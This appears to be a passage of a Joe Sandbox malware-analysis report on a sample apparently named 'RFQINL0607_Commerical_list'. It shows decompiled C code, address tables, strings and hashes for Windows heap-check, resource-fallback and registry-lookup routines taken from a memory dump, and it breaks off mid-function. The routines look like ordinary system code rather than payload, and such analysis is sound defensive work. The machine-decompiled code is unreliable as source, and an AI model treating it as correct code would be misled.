                                                                                                                                                                                  0x333fd700
                                                                                                                                                                                  0x333fd700
                                                                                                                                                                                  0x333fd70d
                                                                                                                                                                                  0x333fd70d
                                                                                                                                                                                  0x333fd731
                                                                                                                                                                                  0x333fd6e0
                                                                                                                                                                                  0x333fd6e3
                                                                                                                                                                                  0x333fd6e3
                                                                                                                                                                                  0x333fd6cb
                                                                                                                                                                                  0x333fd6d1
                                                                                                                                                                                  0x333fd6d1
                                                                                                                                                                                  0x333fd6ba
                                                                                                                                                                                  0x333fd6c2
                                                                                                                                                                                  0x333fd6c2
                                                                                                                                                                                  0x333fd738
                                                                                                                                                                                  0x333fd646
                                                                                                                                                                                  0x333fd64a
                                                                                                                                                                                  0x333fd65b
                                                                                                                                                                                  0x333fd64c
                                                                                                                                                                                  0x333fd64c
                                                                                                                                                                                  0x333fd651
                                                                                                                                                                                  0x333fd653
                                                                                                                                                                                  0x333fd653
                                                                                                                                                                                  0x333fd656
                                                                                                                                                                                  0x333fd656
                                                                                                                                                                                  0x333fd664
                                                                                                                                                                                  0x333fd664
                                                                                                                                                                                  0x333fd73a
                                                                                                                                                                                  0x333fd73f
                                                                                                                                                                                  0x333fd74c
                                                                                                                                                                                  0x333fd756
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fd756
                                                                                                                                                                                  0x333fd751
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fd741
                                                                                                                                                                                  0x333fd741
                                                                                                                                                                                  0x333fd745
                                                                                                                                                                                  0x333fd745
                                                                                                                                                                                  0x333fd758
                                                                                                                                                                                  0x333fd75a
                                                                                                                                                                                  0x333fd75c
                                                                                                                                                                                  0x333fd764
                                                                                                                                                                                  0x333fd767
                                                                                                                                                                                  0x333fd76c
                                                                                                                                                                                  0x333fd772
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fd77f
                                                                                                                                                                                  0x333fd79f
                                                                                                                                                                                  0x333fd7a4
                                                                                                                                                                                  0x333fd781
                                                                                                                                                                                  0x333fd797
                                                                                                                                                                                  0x333fd79c
                                                                                                                                                                                  0x333fd7ad
                                                                                                                                                                                  0x333fd7b0
                                                                                                                                                                                  0x333fd7b7
                                                                                                                                                                                  0x333fd7c9
                                                                                                                                                                                  0x333fd7cb
                                                                                                                                                                                  0x333fd7d2
                                                                                                                                                                                  0x333fd7d3
                                                                                                                                                                                  0x333fd7d3
                                                                                                                                                                                  0x333fd7da
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fd7da

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 333FD792
                                                                                                                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 333FD7B2
                                                                                                                                                                                  • HEAP: , xrefs: 333FD79F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                  • API String ID: 0-3815128232
                                                                                                                                                                                  • Opcode ID: 9d835512f42367fbfa2c6bfce0cbd8e107b3500313ab1833fe84619f4a38acb9
                                                                                                                                                                                  • Instruction ID: 11ad0e275918800ed50f0fd410389fac6667f585ccbec9f643f147d9c5c45be5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d835512f42367fbfa2c6bfce0cbd8e107b3500313ab1833fe84619f4a38acb9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0251FE791403508EF360EF29C848772B7E5DF45285FD4C89AF4C58F689EA2BD84ADB20
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 61%
                                                                                                                                                                                  			E3334753F(signed int __ecx, signed int __edx, intOrPtr _a4) {
				unsigned int _v12;
				signed char _t46;
				signed char _t50;
				intOrPtr* _t52;
				unsigned int _t53;
				signed char _t54;
				signed int _t57;
				signed int _t60;
				intOrPtr _t64;
				intOrPtr* _t66;
				signed int _t67;
				unsigned int _t78;
				signed int _t80;

				_t60 = __edx;
				_t80 = __ecx;
				if(__edx == 0 || (__edx & 0x00000007) != 0) {
					L37:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3334B910();
					} else {
						E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t60 + 8);
					_push(_t80);
					E3334B910("Invalid address specified to %s( %p, %p )\n", _a4);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x334447a1 = 1;
						asm("int3");
						 *0x334447a1 = 0;
					}
					return 0;
				} else {
					_t46 =  *((intOrPtr*)(__edx + 7));
					if((_t46 & 0x0000003f) == 0) {
						goto L37;
					}
					if(_t46 < 0) {
						if( *((char*)(__ecx + 0xea)) != 2) {
							_t64 = 0;
						} else {
							_t64 =  *((intOrPtr*)(__ecx + 0xe4));
						}
						if(_t64 != 0) {
							if(_t46 != 4) {
								L23:
								return 1;
							}
						}
						goto L37;
					}
					if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
						L6:
						if( *((char*)(_t60 + 7)) == 4) {
							if((_t60 & 0x00000fff) != 0x18) {
								goto L37;
							}
							L13:
							if( *(_t80 + 0x4c) == 0) {
								_t50 =  *((intOrPtr*)(_t60 + 2));
							} else {
								_t53 =  *_t60;
								if(( *(_t80 + 0x4c) & _t53) != 0) {
									_t53 = _t53 ^  *(_t80 + 0x50);
								}
								_t50 = _t53 >> 0x10;
							}
							if((_t50 & 0x00000004) != 0) {
								if(E333FD62C(_t80, _t60) != 0) {
									goto L18;
								}
							} else {
								L18:
								if( *((char*)(_t60 + 7)) == 4) {
									goto L23;
								}
								_t66 = _t80 + 0xa4;
								_t52 =  *_t66;
								while(_t52 != _t66) {
									if(_t60 <  *((intOrPtr*)(_t52 + 0x14)) || _t60 >=  *((intOrPtr*)(_t52 + 0x18))) {
										_t52 =  *_t52;
										continue;
									} else {
										goto L23;
									}
								}
							}
							goto L37;
						}
						_t54 =  *((intOrPtr*)(_t60 + 6));
						if(_t54 == 0) {
							_t67 = _t80;
						} else {
							_t67 = (_t60 & 0xffff0000) - ((_t54 & 0x000000ff) << 0x10) + 0x10000;
						}
						if(_t67 == 0 ||  *((intOrPtr*)(_t67 + 0x18)) != _t80 || _t60 <  *((intOrPtr*)(_t67 + 0x24)) || _t60 >=  *((intOrPtr*)(_t67 + 0x28))) {
							goto L37;
						} else {
							goto L13;
						}
					}
					_t57 =  *__edx;
					_t78 =  *(__ecx + 0x50) ^ _t57;
					_v12 = _t57;
					_v12 = _t78;
					if(_t78 >> 0x18 != (_t78 >> 0x00000010 ^ _t78 >> 0x00000008 ^ _t78)) {
						goto L37;
					}
					goto L6;
				}
			}
















                                                                                                                                                                                  0x33347548
                                                                                                                                                                                  0x3334754b
                                                                                                                                                                                  0x3334754f
                                                                                                                                                                                  0x333aad1e
                                                                                                                                                                                  0x333aad28
                                                                                                                                                                                  0x333aad47
                                                                                                                                                                                  0x333aad4c
                                                                                                                                                                                  0x333aad2a
                                                                                                                                                                                  0x333aad3f
                                                                                                                                                                                  0x333aad44
                                                                                                                                                                                  0x333aad55
                                                                                                                                                                                  0x333aad56
                                                                                                                                                                                  0x333aad5f
                                                                                                                                                                                  0x333aad71
                                                                                                                                                                                  0x333aad73
                                                                                                                                                                                  0x333aad7a
                                                                                                                                                                                  0x333aad7b
                                                                                                                                                                                  0x333aad7b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334755e
                                                                                                                                                                                  0x3334755e
                                                                                                                                                                                  0x33347563
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334756b
                                                                                                                                                                                  0x33347639
                                                                                                                                                                                  0x33347659
                                                                                                                                                                                  0x3334763b
                                                                                                                                                                                  0x3334763b
                                                                                                                                                                                  0x3334763b
                                                                                                                                                                                  0x33347643
                                                                                                                                                                                  0x3334764b
                                                                                                                                                                                  0x33347626
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33347626
                                                                                                                                                                                  0x3334764d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33347643
                                                                                                                                                                                  0x33347575
                                                                                                                                                                                  0x3334759d
                                                                                                                                                                                  0x333475a1
                                                                                                                                                                                  0x333aad06
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333475eb
                                                                                                                                                                                  0x333475ef
                                                                                                                                                                                  0x3334765d
                                                                                                                                                                                  0x333475f1
                                                                                                                                                                                  0x333475f1
                                                                                                                                                                                  0x333475f6
                                                                                                                                                                                  0x333475f8
                                                                                                                                                                                  0x333475f8
                                                                                                                                                                                  0x333475fb
                                                                                                                                                                                  0x333475fb
                                                                                                                                                                                  0x33347600
                                                                                                                                                                                  0x333aad18
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33347606
                                                                                                                                                                                  0x33347606
                                                                                                                                                                                  0x3334760a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334760c
                                                                                                                                                                                  0x33347612
                                                                                                                                                                                  0x33347614
                                                                                                                                                                                  0x3334761f
                                                                                                                                                                                  0x3334762e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334761f
                                                                                                                                                                                  0x33347614
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33347600
                                                                                                                                                                                  0x333475a7
                                                                                                                                                                                  0x333475ac
                                                                                                                                                                                  0x33347652
                                                                                                                                                                                  0x333475b2
                                                                                                                                                                                  0x333475c2
                                                                                                                                                                                  0x333475c2
                                                                                                                                                                                  0x333475ca
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333475ca
                                                                                                                                                                                  0x33347577
                                                                                                                                                                                  0x3334757c
                                                                                                                                                                                  0x3334757e
                                                                                                                                                                                  0x33347583
                                                                                                                                                                                  0x33347597
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33347597

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                  • API String ID: 0-1151232445
                                                                                                                                                                                  • Opcode ID: 833f993f6380f83168bdca2a80770c637e38cc2dbf55da0bc1d6cee65b3897b6
                                                                                                                                                                                  • Instruction ID: efb46d26971960d6257a52ac30cb5ffa9f83e7e4264d04c59775a0698d5944a5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 833f993f6380f83168bdca2a80770c637e38cc2dbf55da0bc1d6cee65b3897b6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7541F2796803808FFB15CF2CC8A0B6577E5DF01245F68C4A9E4D58BA56CB79D486CB21
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3335A1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E3335A1E3(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				short _v22;
				char _v24;
				char* _v28;
				short _v30;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t34;
				short _t35;
				signed int* _t37;
				signed char* _t38;
				signed int _t39;
				signed char* _t40;
				intOrPtr* _t43;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t49;
				signed int _t53;
				signed char* _t58;
				short _t61;
				intOrPtr* _t63;
				intOrPtr _t68;
				signed int _t71;
				signed int _t72;

				_v16 = __edx;
				_t72 = 0;
				_t68 = __ecx;
				_v8 = 0;
				_t61 = 0x42;
				_t34 = 0x44;
				_v22 = _t34;
				_t58 = 0x7ffe0385;
				_t35 = 0x40;
				_v32 = _t35;
				_v12 = __ecx;
				_v24 = _t61;
				_v20 = L"RtlpResUltimateFallbackInfo Enter";
				_t37 =  *( *[fs:0x30] + 0x50);
				_v30 = _t61;
				_v28 = L"RtlpResUltimateFallbackInfo Exit";
				if(_t37 != 0) {
					__eflags =  *_t37;
					if(__eflags == 0) {
						goto L1;
					}
					_t38 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					_t73 = 0x7ffe0384;
					if(( *_t38 & 0x00000001) != 0) {
						_t39 = L33363C40();
						__eflags = _t39;
						if(_t39 == 0) {
							_t40 = 0x7ffe0384;
						} else {
							_t40 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						L333DFC01( &_v24,  *_t40 & 0x000000ff);
						_t68 = _v12;
					}
					if(_t68 == 0) {
						L28:
						return 0xc000000d;
					} else {
						_t43 = _a4;
						if(_t43 == 0) {
							goto L28;
						}
						_t63 = _a8;
						_t79 = _t63;
						if(_t63 == 0) {
							goto L28;
						}
						 *_t43 = _t72;
						 *_t63 = _t72;
						_t45 = E3335B5E0(_t58, _t72, _t73, _t79, _t68, _v16,  &_v8, _a12, "true");
						if(_t45 >= 0) {
							_t46 = _v8;
							__eflags = _t46;
							if(_t46 == 0) {
								L17:
								_t72 = 0xc0000001;
								L14:
								_t47 = L33363C40();
								__eflags = _t47;
								if(_t47 != 0) {
									_t58 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
								}
								__eflags =  *_t58 & 0x00000001;
								if(( *_t58 & 0x00000001) != 0) {
									_t49 = L33363C40();
									__eflags = _t49;
									if(_t49 != 0) {
										_t73 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
									}
									L333DFC01( &_v32,  *_t73 & 0x000000ff);
									goto L16;
								} else {
									L16:
									return _t72;
								}
							}
							__eflags = _t46 - 0xffffffff;
							if(_t46 == 0xffffffff) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t46 + 0x7c)) - _t72;
							if( *((intOrPtr*)(_t46 + 0x7c)) == _t72) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t46 + 0x80)) - _t72;
							if( *((intOrPtr*)(_t46 + 0x80)) == _t72) {
								goto L17;
							}
							_t71 =  *(_t46 + 0x18);
							__eflags = _t71;
							if(_t71 == 0) {
								goto L17;
							}
							_t53 = _t46 +  *((intOrPtr*)(_t46 + 0x7c));
							__eflags = _t53;
							 *_a8 = _t71;
							 *_a4 = _t53;
							goto L14;
						}
						return _t45;
					}
				}
				L1:
				_t38 = _t58;
				goto L2;
			}


































                                                                                                                                                                                  0x3335a1f0
                                                                                                                                                                                  0x3335a1f3
                                                                                                                                                                                  0x3335a1f5
                                                                                                                                                                                  0x3335a1f7
                                                                                                                                                                                  0x3335a1fa
                                                                                                                                                                                  0x3335a1fd
                                                                                                                                                                                  0x3335a1fe
                                                                                                                                                                                  0x3335a202
                                                                                                                                                                                  0x3335a209
                                                                                                                                                                                  0x3335a20a
                                                                                                                                                                                  0x3335a214
                                                                                                                                                                                  0x3335a217
                                                                                                                                                                                  0x3335a21b
                                                                                                                                                                                  0x3335a222
                                                                                                                                                                                  0x3335a225
                                                                                                                                                                                  0x3335a229
                                                                                                                                                                                  0x3335a232
                                                                                                                                                                                  0x333b2965
                                                                                                                                                                                  0x333b2967
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2976
                                                                                                                                                                                  0x3335a23a
                                                                                                                                                                                  0x3335a23d
                                                                                                                                                                                  0x3335a242
                                                                                                                                                                                  0x333b2980
                                                                                                                                                                                  0x333b2985
                                                                                                                                                                                  0x333b2987
                                                                                                                                                                                  0x333b2999
                                                                                                                                                                                  0x333b2989
                                                                                                                                                                                  0x333b2992
                                                                                                                                                                                  0x333b2992
                                                                                                                                                                                  0x333b29a1
                                                                                                                                                                                  0x333b29a6
                                                                                                                                                                                  0x333b29a6
                                                                                                                                                                                  0x3335a24a
                                                                                                                                                                                  0x333b29ea
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a250
                                                                                                                                                                                  0x3335a250
                                                                                                                                                                                  0x3335a255
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a25b
                                                                                                                                                                                  0x3335a25e
                                                                                                                                                                                  0x3335a260
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a26b
                                                                                                                                                                                  0x3335a274
                                                                                                                                                                                  0x3335a277
                                                                                                                                                                                  0x3335a27e
                                                                                                                                                                                  0x3335a287
                                                                                                                                                                                  0x3335a28a
                                                                                                                                                                                  0x3335a28c
                                                                                                                                                                                  0x3335a2ce
                                                                                                                                                                                  0x3335a2ce
                                                                                                                                                                                  0x3335a2b4
                                                                                                                                                                                  0x3335a2b4
                                                                                                                                                                                  0x3335a2b9
                                                                                                                                                                                  0x3335a2bb
                                                                                                                                                                                  0x333b29b7
                                                                                                                                                                                  0x333b29b7
                                                                                                                                                                                  0x3335a2c1
                                                                                                                                                                                  0x3335a2c4
                                                                                                                                                                                  0x333b29c2
                                                                                                                                                                                  0x333b29c7
                                                                                                                                                                                  0x333b29c9
                                                                                                                                                                                  0x333b29d4
                                                                                                                                                                                  0x333b29d4
                                                                                                                                                                                  0x333b29d4
                                                                                                                                                                                  0x333b29e0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a2ca
                                                                                                                                                                                  0x3335a2ca
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a2ca
                                                                                                                                                                                  0x3335a2c4
                                                                                                                                                                                  0x3335a28e
                                                                                                                                                                                  0x3335a291
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a293
                                                                                                                                                                                  0x3335a296
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a298
                                                                                                                                                                                  0x3335a29e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a2a0
                                                                                                                                                                                  0x3335a2a3
                                                                                                                                                                                  0x3335a2a5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a2aa
                                                                                                                                                                                  0x3335a2aa
                                                                                                                                                                                  0x3335a2ad
                                                                                                                                                                                  0x3335a2b2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a2b2
                                                                                                                                                                                  0x3335a284
                                                                                                                                                                                  0x3335a284
                                                                                                                                                                                  0x3335a24a
                                                                                                                                                                                  0x3335a238
                                                                                                                                                                                  0x3335a238
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 3335A21B
                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 3335A229
                                                                                                                                                                                  • @S23, xrefs: 3335A268
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @S23$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                  • API String ID: 0-600919089
                                                                                                                                                                                  • Opcode ID: 7a9b2483a80e90508d99ca3c00859dfce1b8e91c1a1f359d91f753f18f9ec615
                                                                                                                                                                                  • Instruction ID: 3e4058f4adf7bc7182ef4eb4d12802b7e841e135ffc74ff19ee7a0e862b16570
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a9b2483a80e90508d99ca3c00859dfce1b8e91c1a1f359d91f753f18f9ec615
                                                                                                                                                                                  • Instruction Fuzzy Hash: A241FC74A84704DFEB02CF99C891F5AB7B8EF45740F18C1A5F844DB6A0E636C920DB50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333DB214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                                  			E333DB214(void* __ecx) {
				char _v8;
				char _v12;
				short _v14;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char* _v36;
				char _v40;
				char _v44;
				intOrPtr _v576;
				char _v580;
				intOrPtr _t44;
				intOrPtr _t46;
				intOrPtr* _t61;
				void* _t64;
				short _t65;
				void* _t66;
				intOrPtr* _t67;

				_t66 = __ecx;
				_v8 = 0;
				E33398F40( &_v580, 0, 0x214);
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_push(0);
				_push(0x210);
				_push( &_v580);
				_push(0x2b);
				_push(_t66);
				if((E33392B20() & 0xc0000000) == 0xc0000000) {
					L9:
					if(_v8 != 0) {
						_push(_v8);
						E33392A80();
						_v8 = 0;
					}
					_t38 = _v12;
					if(_v12 != 0) {
						E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t38);
					}
					return _v20;
				}
				_t67 = E333DB39F(_v576);
				if(_t67 == 0) {
					goto L9;
				} else {
					_t61 = _t67;
					_t8 = _t61 + 2; // 0x2
					_t64 = _t8;
					goto L3;
					L3:
					_t44 =  *_t61;
					_t61 = _t61 + 2;
					if(_t44 != 0) {
						goto L3;
					} else {
						_t63 = _t61 - _t64 >> 1;
						_t65 = 0xc2 + (_t61 - _t64 >> 1) * 2;
						_t46 = L33365D90(_t61 - _t64 >> 1,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t65);
						_v12 = _t46;
						if(_t46 != 0) {
							_v14 = _t65;
							if(E3335FE40(_t63,  &_v16, L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\") >= 0 && E3335FE40(_t63,  &_v16, _t67) >= 0) {
								_v44 = 0x18;
								_v36 =  &_v16;
								_push( &_v44);
								_push("true");
								_v40 = 0;
								_push( &_v8);
								_v32 = 0x40;
								_v28 = 0;
								_v24 = 0;
								if(E33392AB0() >= 0) {
									L33346CC0(_v8, L"GlobalFlag", 4,  &_v20, 4, 0);
								}
							}
						}
						goto L9;
					}
				}
			}























                                                                                                                                                                                  0x333db231
                                                                                                                                                                                  0x333db233
                                                                                                                                                                                  0x333db236
                                                                                                                                                                                  0x333db23e
                                                                                                                                                                                  0x333db247
                                                                                                                                                                                  0x333db24a
                                                                                                                                                                                  0x333db24d
                                                                                                                                                                                  0x333db24e
                                                                                                                                                                                  0x333db253
                                                                                                                                                                                  0x333db254
                                                                                                                                                                                  0x333db256
                                                                                                                                                                                  0x333db265
                                                                                                                                                                                  0x333db31c
                                                                                                                                                                                  0x333db31f
                                                                                                                                                                                  0x333db321
                                                                                                                                                                                  0x333db324
                                                                                                                                                                                  0x333db329
                                                                                                                                                                                  0x333db329
                                                                                                                                                                                  0x333db32c
                                                                                                                                                                                  0x333db331
                                                                                                                                                                                  0x333db33e
                                                                                                                                                                                  0x333db33e
                                                                                                                                                                                  0x333db34a
                                                                                                                                                                                  0x333db34a
                                                                                                                                                                                  0x333db276
                                                                                                                                                                                  0x333db27a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333db280
                                                                                                                                                                                  0x333db280
                                                                                                                                                                                  0x333db282
                                                                                                                                                                                  0x333db282
                                                                                                                                                                                  0x333db282
                                                                                                                                                                                  0x333db285
                                                                                                                                                                                  0x333db285
                                                                                                                                                                                  0x333db288
                                                                                                                                                                                  0x333db28e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333db290
                                                                                                                                                                                  0x333db298
                                                                                                                                                                                  0x333db29a
                                                                                                                                                                                  0x333db2a6
                                                                                                                                                                                  0x333db2ab
                                                                                                                                                                                  0x333db2b0
                                                                                                                                                                                  0x333db2ba
                                                                                                                                                                                  0x333db2c6
                                                                                                                                                                                  0x333db2d9
                                                                                                                                                                                  0x333db2e0
                                                                                                                                                                                  0x333db2e6
                                                                                                                                                                                  0x333db2e7
                                                                                                                                                                                  0x333db2ec
                                                                                                                                                                                  0x333db2ef
                                                                                                                                                                                  0x333db2f0
                                                                                                                                                                                  0x333db2f7
                                                                                                                                                                                  0x333db2fa
                                                                                                                                                                                  0x333db304
                                                                                                                                                                                  0x333db317
                                                                                                                                                                                  0x333db317
                                                                                                                                                                                  0x333db304
                                                                                                                                                                                  0x333db2c6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333db2b0
                                                                                                                                                                                  0x333db28e

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • GlobalFlag, xrefs: 333DB30F
                                                                                                                                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 333DB2B2
                                                                                                                                                                                  • @, xrefs: 333DB2F0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                  • API String ID: 0-4192008846
                                                                                                                                                                                  • Opcode ID: f71b9861fdf63597e0bc3cca487f05f713f3e8e4a7d0533839a9c1db91829842
                                                                                                                                                                                  • Instruction ID: 8aa91935f4af294ccebde71b4fddb5e41fc0ab6e409c363569e99f1c605e2d08
                                                                                                                                                                                  • Opcode Fuzzy Hash: f71b9861fdf63597e0bc3cca487f05f713f3e8e4a7d0533839a9c1db91829842
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A316DB2D41209AEEB00DF94DC80FEEBBBCEF44784F448469E601E7551DB749E049B90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33381527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                                  			E33381527(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t17;
				intOrPtr _t19;
				signed int _t25;
				signed int _t28;
				intOrPtr _t35;
				signed int _t39;
				signed int _t41;
				signed int _t43;
				void* _t45;
				signed int _t51;

				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(_t28);
				_t43 =  *0x33445d8c; // 0x2fe2d40
				_push(_t39);
				if(_t43 == 0x33445d8c) {
					L5:
					 *0x33445c90 =  *0x33445c90 & 0x00000000;
					 *0x33445c94 =  *0x33445c94 & 0x00000000;
					_t51 =  *0x33445c94;
					L6:
					_t17 = E333815EF(_t28, _t39, _t43, _t51);
					L7:
					return _t17;
				}
